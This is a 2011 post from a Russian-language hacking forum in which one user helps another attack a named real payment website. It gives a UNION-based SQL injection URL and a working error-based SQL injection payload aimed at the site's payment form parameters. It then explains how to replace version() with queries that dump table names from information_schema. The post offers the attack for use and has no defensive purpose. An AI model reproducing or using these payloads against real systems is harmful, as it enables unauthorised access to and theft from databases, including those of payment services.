Показать сообщение отдельно

  #8  
Старый 22.07.2011, 22:19
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от Faaax  
может кто помочь или нет?
Код:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 #
не могу даже название бд узнать
параметры(те что отсылаются при нажатии кнопки "оплата") для поста на корень сайта

Код:
action=pay&id=213123'+and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x   from information_schema.tables group by x)a)--+'&email=a%40a.ru&submit_button=%CE%CF%CB%C0%D2%C0
юзается Error-based SQL-Injection, вместо version() подставлять (select 1) или (select group_concat(table_name) from information_schema.tables), ну и так далее
 
Ответить с цитированием